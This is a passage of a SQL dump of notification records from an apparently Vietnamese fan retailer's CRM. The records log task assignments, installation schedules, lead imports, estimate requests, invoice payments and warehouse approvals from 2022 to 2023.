(1424, 0, 0, '2022-09-20 14:07:48', 'not_task_new_comment', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83#comment_4', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1429, 0, 0, '2022-09-20 14:07:58', 'not_task_new_comment', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83#comment_5', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1442, 0, 0, '2022-09-20 14:09:10', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=84', 'a:1:{i:0;s:80:\"Lịch lắp đặt sau khảo sát Mr.Luân sẽ đi khảo sát - QUOTE-105-22\";}');
INSERT INTO `tblnotifications` (`id`, `isread`, `isread_inline`, `date`, `description`, `fromuserid`, `fromclientid`, `from_fullname`, `touserid`, `fromcompany`, `link`, `additional_data`) VALUES
(1450, 0, 0, '2022-09-20 14:09:10', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=84', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:80:\"Lịch lắp đặt sau khảo sát Mr.Luân sẽ đi khảo sát - QUOTE-105-22\";}'),
(1454, 0, 0, '2022-09-20 14:09:10', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=84', 'a:1:{i:0;s:80:\"Lịch lắp đặt sau khảo sát Mr.Luân sẽ đi khảo sát - QUOTE-105-22\";}'),
(1458, 0, 0, '2022-09-23 11:53:47', 'not_task_deadline_reminder', 0, 0, '', 7, 1, '#taskid=83', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1460, 1, 1, '2022-09-23 11:53:47', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=83', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1465, 1, 1, '2022-09-27 07:33:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=18', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(1472, 1, 1, '2022-09-28 09:57:45', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/33', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1476, 0, 0, '2022-09-28 09:57:45', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/33', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1504, 1, 1, '2022-10-08 16:32:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/34', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1508, 0, 0, '2022-10-08 16:32:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/34', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1513, 1, 1, '2022-10-14 12:19:41', 'not_proposal_proposal_accepted', 0, 0, '', 1, 1, 'proposals/list_proposals/15', 'a:1:{i:0;s:6:\"PRO-15\";}'),
(1528, 0, 0, '2022-10-17 09:34:32', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=88', 'a:1:{i:0;s:49:\"Lắp đặt quạt cho Mỹ Phương - Quận 7 \";}'),
(1538, 0, 0, '2022-10-17 09:34:32', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=88', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:49:\"Lắp đặt quạt cho Mỹ Phương - Quận 7 \";}'),
(1543, 0, 0, '2022-10-17 09:34:32', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=88', 'a:1:{i:0;s:49:\"Lắp đặt quạt cho Mỹ Phương - Quận 7 \";}'),
(1546, 1, 1, '2022-10-17 15:08:34', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=19', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(1552, 1, 1, '2022-10-26 16:59:18', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/35', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1556, 0, 0, '2022-10-26 16:59:18', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/35', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1559, 1, 1, '2022-10-31 09:07:12', 'not_estimate_customer_declined', 0, 0, '', 1, 1, 'estimates/list_estimates/104', 'a:1:{i:0;s:12:\"QUOTE-104-22\";}'),
(1561, 1, 1, '2022-10-31 18:58:30', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=20', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(1566, 1, 1, '2022-11-01 22:11:42', 'not_customer_viewed_proposal', 0, 0, '', 1, 1, 'proposals/list_proposals/18', 'a:1:{i:0;s:6:\"PRO-18\";}'),
(1568, 1, 1, '2022-11-03 22:24:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=21', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}'),
(1582, 1, 1, '2022-11-11 21:16:37', 'not_customer_viewed_proposal', 0, 0, '', 1, 1, 'proposals/list_proposals/17', 'a:1:{i:0;s:6:\"PRO-17\";}'),
(1584, 1, 1, '2022-11-12 20:55:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/36', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1588, 0, 0, '2022-11-12 20:55:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/36', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1591, 1, 1, '2022-11-13 08:31:11', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/24', 'a:1:{i:0;s:1:\"1\";}'),
(1592, 1, 1, '2022-11-13 08:31:15', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/24', 'a:1:{i:0;s:1:\"1\";}'),
(1600, 1, 1, '2022-11-17 06:53:03', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=91', 'a:1:{i:0;s:57:\"Đề xuất Mẫu Quạt (4 mẫu) cho dự án Levitate\";}'),
(1613, 0, 0, '2022-11-17 08:27:37', 'not_task_marked_as_complete', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=83', 'a:1:{i:0;s:136:\"Thứ 6 ngày 23.09 sẳn sàng đi lắp đặt địa chỉ Chung cư, Liên hệ quản lý thi công đăng ký mới lên căn hộ\";}'),
(1636, 1, 1, '2022-11-17 18:25:29', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=22', 'a:0:{}'),
(1637, 1, 1, '2022-11-17 18:25:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=22', 'a:1:{i:0;s:36:\"Nhà thầu - tư vấn thiết kế\";}'),
(1640, 1, 1, '2022-11-17 23:35:59', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=23', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}'),
(1653, 1, 1, '2022-11-22 10:38:03', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=24', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}'),
(1663, 0, 0, '2022-11-24 08:58:05', 'not_task_deadline_reminder', 0, 0, '', 7, 1, '#taskid=88', 'a:1:{i:0;s:49:\"Lắp đặt quạt cho Mỹ Phương - Quận 7 \";}'),
(1665, 1, 1, '2022-11-24 08:58:05', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=88', 'a:1:{i:0;s:49:\"Lắp đặt quạt cho Mỹ Phương - Quận 7 \";}'),
(1671, 1, 1, '2022-11-25 04:28:16', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/25', 'a:1:{i:0;s:1:\"1\";}'),
(1672, 1, 1, '2022-11-25 04:28:19', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/25', 'a:1:{i:0;s:1:\"1\";}'),
(1673, 1, 1, '2022-11-25 04:39:04', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/26', 'a:1:{i:0;s:1:\"1\";}'),
(1674, 1, 1, '2022-11-25 04:39:07', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/26', 'a:1:{i:0;s:1:\"1\";}'),
(1675, 1, 1, '2022-11-25 04:43:44', 'notify_send_approve_loss_adjustment', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/view_lost_adjustment/4', 'a:1:{i:0;s:1:\"3\";}'),
(1677, 1, 1, '2022-11-25 19:17:00', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/37', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1681, 0, 0, '2022-11-25 19:17:00', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/37', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1695, 1, 1, '2022-11-29 14:51:14', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/27', 'a:1:{i:0;s:1:\"1\";}'),
(1696, 1, 1, '2022-11-29 14:51:19', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/27', 'a:1:{i:0;s:1:\"1\";}'),
(1703, 0, 0, '2022-11-29 14:54:04', 'not_task_marked_as_complete', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=84', 'a:1:{i:0;s:80:\"Lịch lắp đặt sau khảo sát Mr.Luân sẽ đi khảo sát - QUOTE-105-22\";}'),
(1717, 1, 1, '2022-11-30 09:18:16', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=94', 'a:1:{i:0;s:63:\"Giao hàng 3 quạt AKMANI (không đèn) màu gỗ Dark Walnut\";}'),
(1725, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=94', 'a:1:{i:0;s:63:\"Giao hàng 3 quạt AKMANI (không đèn) màu gỗ Dark Walnut\";}'),
(1726, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=95', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1727, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=96', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1728, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=97', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1729, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=98', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1730, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=99', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1731, 0, 0, '2022-12-01 12:19:19', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 0, NULL, '#taskid=100', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(1732, 1, 1, '2022-12-01 13:16:58', 'not_estimate_customer_declined', 0, 0, '', 1, 1, 'estimates/list_estimates/2', 'a:1:{i:0;s:6:\"BGQT-2\";}'),
(1733, 0, 0, '2022-12-01 13:16:58', 'not_estimate_customer_declined', 0, 0, '', 7, 1, 'estimates/list_estimates/2', 'a:1:{i:0;s:6:\"BGQT-2\";}'),
(1747, 1, 1, '2022-12-02 19:26:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/28', 'a:1:{i:0;s:1:\"1\";}'),
(1748, 1, 1, '2022-12-02 19:27:01', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/28', 'a:1:{i:0;s:1:\"1\";}'),
(1791, 0, 0, '2022-12-06 15:48:26', 'not_task_assigned_to_you', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=106', 'a:1:{i:0;s:58:\"Gởi hàng giao tận nơi - đi chành xe Phương Trang\";}'),
(1801, 0, 0, '2022-12-06 15:48:26', 'not_task_assigned_someone', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=106', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:58:\"Gởi hàng giao tận nơi - đi chành xe Phương Trang\";}'),
(1806, 0, 0, '2022-12-06 15:48:26', 'not_task_added_himself_as_follower', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=106', 'a:1:{i:0;s:58:\"Gởi hàng giao tận nơi - đi chành xe Phương Trang\";}'),
(1808, 1, 1, '2022-12-16 11:49:42', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/242', 'a:1:{i:0;s:10:\"INV-237-22\";}'),
(1809, 1, 1, '2022-12-16 11:51:21', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/241', 'a:1:{i:0;s:10:\"INV-236-22\";}'),
(1811, 1, 1, '2022-12-19 14:40:10', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/29', 'a:1:{i:0;s:1:\"1\";}'),
(1812, 1, 1, '2022-12-19 14:40:15', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/29', 'a:1:{i:0;s:1:\"1\";}'),
(1821, 0, 0, '2022-12-20 08:48:43', 'not_task_marked_as_complete', 1, 0, 'Ho Gia Phat', 7, NULL, '#taskid=106', 'a:1:{i:0;s:58:\"Gởi hàng giao tận nơi - đi chành xe Phương Trang\";}'),
(1877, 1, 1, '2022-12-21 13:52:09', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/227', 'a:1:{i:0;s:10:\"INV-218-22\";}'),
(1878, 1, 1, '2022-12-22 10:58:41', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/247', 'a:1:{i:0;s:10:\"INV-242-22\";}'),
(1899, 1, 1, '2022-12-29 17:30:58', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/38', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1903, 0, 0, '2022-12-29 17:30:58', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/38', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1908, 1, 1, '2023-01-03 19:49:17', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/39', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1912, 0, 0, '2023-01-03 19:49:17', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/39', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1917, 1, 1, '2023-01-11 16:08:09', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/254', 'a:1:{i:0;s:10:\"INV-249-23\";}'),
(1920, 1, 1, '2023-01-31 16:51:47', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/40', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1924, 0, 0, '2023-01-31 16:51:47', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/40', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1927, 1, 1, '2023-02-03 16:48:57', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/257', 'a:1:{i:0;s:10:\"INV-252-23\";}'),
(1929, 1, 1, '2023-02-04 10:52:16', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/30', 'a:1:{i:0;s:1:\"1\";}'),
(1930, 1, 1, '2023-02-04 10:52:19', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/30', 'a:1:{i:0;s:1:\"1\";}'),
(1932, 1, 1, '2023-02-06 14:55:45', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/41', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1936, 0, 0, '2023-02-06 14:55:46', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/41', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1944, 1, 1, '2023-02-09 12:47:16', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/42', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1948, 0, 0, '2023-02-09 12:47:16', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/42', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1952, 1, 1, '2023-02-09 13:05:54', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/43', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1956, 0, 0, '2023-02-09 13:05:54', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/43', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1960, 1, 1, '2023-02-11 09:57:36', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/44', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1964, 0, 0, '2023-02-11 09:57:36', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/44', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1968, 1, 1, '2023-02-14 10:17:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/45', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1972, 0, 0, '2023-02-14 10:17:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/45', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(1992, 1, 1, '2023-02-14 15:49:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/46', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1996, 0, 0, '2023-02-14 15:49:55', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/46', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(1999, 1, 1, '2023-02-16 09:10:11', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/260', 'a:1:{i:0;s:10:\"INV-255-23\";}'),
(2000, 1, 1, '2023-02-17 12:56:03', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=116', 'a:1:{i:0;s:101:\"Bảo trì 3 quạt trần trong nhà (vệ sinh, tra dầu...) vì phát ra tiếng kêu khi chạy.\";}'),
(2012, 1, 1, '2023-02-24 01:00:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=123', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2014, 1, 1, '2023-02-24 01:15:01', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=124', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2016, 1, 1, '2023-02-24 01:30:01', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=125', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2018, 1, 1, '2023-02-24 01:45:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=126', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2020, 1, 1, '2023-02-25 01:00:01', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=127', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2022, 1, 1, '2023-02-25 01:15:01', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=128', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2024, 1, 1, '2023-02-25 01:30:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=129', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2026, 1, 1, '2023-02-25 01:45:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=130', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2032, 1, 1, '2023-02-25 10:52:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/47', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(2036, 0, 0, '2023-02-25 10:52:40', 'new_estimate_request_submitted_from_form', 0, 0, '', 7, 1, 'estimate_request/view/47', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(2039, 1, 1, '2023-02-26 01:00:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=131', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2041, 1, 1, '2023-02-26 01:15:02', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=131', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2042, 1, 1, '2023-02-26 01:15:07', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=132', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2044, 1, 1, '2023-02-26 01:30:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=133', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2046, 1, 1, '2023-02-26 01:45:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=134', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2049, 1, 1, '2023-02-27 01:00:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=135', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2051, 1, 1, '2023-02-27 01:15:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=136', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2053, 1, 1, '2023-02-27 01:30:01', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=137', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2055, 1, 1, '2023-02-27 01:45:02', 'new_task_assigned_non_user', 0, 0, '', 1, 1, '#taskid=138', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(2058, 1, 1, '2023-02-27 11:26:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=25', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}'),
(2078, 1, 1, '2023-02-27 21:31:29', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=26', 'a:0:{}'),
(2079, 1, 1, '2023-02-27 21:31:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=26', 'a:1:{i:0;s:36:\"Nhà thầu - tư vấn thiết kế\";}'),
(2080, 1, 1, '2023-02-27 21:36:09', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=27', 'a:0:{}'),
(2081, 1, 1, '2023-02-27 21:36:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=27', 'a:1:{i:0;s:10:\"Contractor\";}'),
(2082, 1, 1, '2023-02-27 21:45:39', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=28', 'a:0:{}'),
(2083, 1, 1, '2023-02-27 21:45:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=28', 'a:1:{i:0;s:10:\"Contractor\";}'),
(2084, 1, 1, '2023-02-27 22:00:02', 'not_new_reminder_for', 0, 0, '', 1, 1, 'leads/index/28', 'a:1:{i:0;s:68:\"Hồ Công Văn - conghovan@gmail.com - Khách hàng quan trọng...\";}'),
(2085, 1, 1, '2023-02-28 06:11:38', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=29', 'a:0:{}'),
(2086, 1, 1, '2023-02-28 06:11:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=29', 'a:1:{i:0;s:10:\"Contractor\";}'),
(2087, 1, 1, '2023-02-28 09:13:37', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=30', 'a:0:{}'),
(2088, 1, 1, '2023-02-28 09:13:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=30', 'a:1:{i:0;s:10:\"Contractor\";}'),
(2089, 0, 0, '2023-02-28 09:21:01', 'not_lead_added_attachment', 1, 0, 'Ho Gia Phat', 0, NULL, '#leadid=30', 'a:1:{i:0;s:15:\"Tuấn Nguyễn\";}'),
(2090, 1, 1, '2023-03-01 15:35:13', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/268', 'a:1:{i:0;s:10:\"INV-264-23\";}'),
(2092, 1, 1, '2023-03-01 19:59:06', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=31', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2098, 1, 1, '2023-03-02 09:39:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=32', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2104, 1, 1, '2023-03-02 13:47:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=33', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2110, 1, 1, '2023-03-02 14:28:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=34', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2116, 1, 1, '2023-03-02 14:31:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=35', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2122, 1, 1, '2023-03-02 14:32:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=36', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2128, 1, 1, '2023-03-02 14:32:55', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=37', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2134, 1, 1, '2023-03-02 14:34:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=38', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2140, 1, 1, '2023-03-02 14:34:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=39', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(2146, 1, 1, '2023-03-02 14:36:16', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=40', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
